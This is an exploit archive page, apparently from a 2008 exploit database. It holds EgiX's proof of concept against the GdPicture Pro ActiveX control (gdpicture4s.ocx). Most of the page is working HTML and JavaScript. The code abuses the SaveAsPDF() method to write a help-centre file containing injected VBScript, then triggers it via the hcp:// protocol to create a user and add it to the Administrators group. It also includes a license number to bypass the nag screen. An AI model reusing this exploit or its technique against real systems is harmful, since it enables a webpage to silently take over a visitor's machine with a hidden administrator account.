GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit
# Published : 2008-09-30
# Author : EgiX
# Previous Title : Autodesk DWF Viewer Control / LiveUpdate Module Remote Exploit
# Next Title : Chilkat IMAP ActiveX 7.9 File Execution / IE DoS Exploit

<!--

	---------------------------------------------------------------------------------
	GdPicture Pro ActiveX (gdpicture4s.ocx) Remote File Overwrite / Execution Exploit
	---------------------------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://www.gdpicture.com/
	ProgID...: GdPicture4S.Imaging
	
	Description:
	
	SaveAsPDF() method allow to create / overwrite file through
	sFilePath argument. By using other arguments, such as sTitle,
	an attacker could be inject html code and execute it using
	the hcp:// protocol (tecnique discovered by rgod).
	Also GdPicturePro5.Imaging is prone to this vulnerability,
	but it doesn't implements the IObjectSafety interface.
	
	Tested on Windows XP SP2 with IE 6/7
	
	Object safety report:
	
	Report for Clsid: {E8512363-3581-42EF-A43D-990E7935C8BE}
	RegKey Safe for Script: False
	RegKey Safe for Init: False
	Implements IObjectSafety: True
	IDisp Safe:  Safe for untrusted: caller,data  
	IPStorage Safe:  Safe for untrusted: caller,data

	[*] A special thanks goes to shinnai, for his patience :)

-->

<object classid='clsid:E8512363-3581-42EF-A43D-990E7935C8BE' id='test'></object>

<script language='javascript'>

	var cmd = "cmd /c net user test test /add & net localgroup Administrators test /add";

	var outFile = "c:\windows\pchealth\helpctr\system\errors\badurl.htm";

	var BMP = "x42x4dx42x00x00x00x00x00x00x00x3e" +
		  "x00x00x00x28x00x00x00x01x00x00x00" +
		  "x01x00x00x00x01x00x01x00x00x00x00" +
		  "x00x04x00x00x00x00x00x00x00x00x00" +
		  "x00x00x00x00x00x00x00x00x00x00x00" +
		  "x00x00x00xffxffxffx00x80x00x00x00";

	var sc = "<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='wsh'></object>" +
		 "<script language='vbscript'>wsh.Run "" + cmd + "", SW_HIDE</script>";

	test.SetLicenseNumber("0317955669879948884162456"); // only to avoid the nag screen
	test.CreateImageFromString(BMP);

	if (test.SaveAsPDF(outFile, sc, "", "", "")) location.href = "hcp://system/errors/badurl.htm";

</script>

# www.Syue.com [2008-09-30]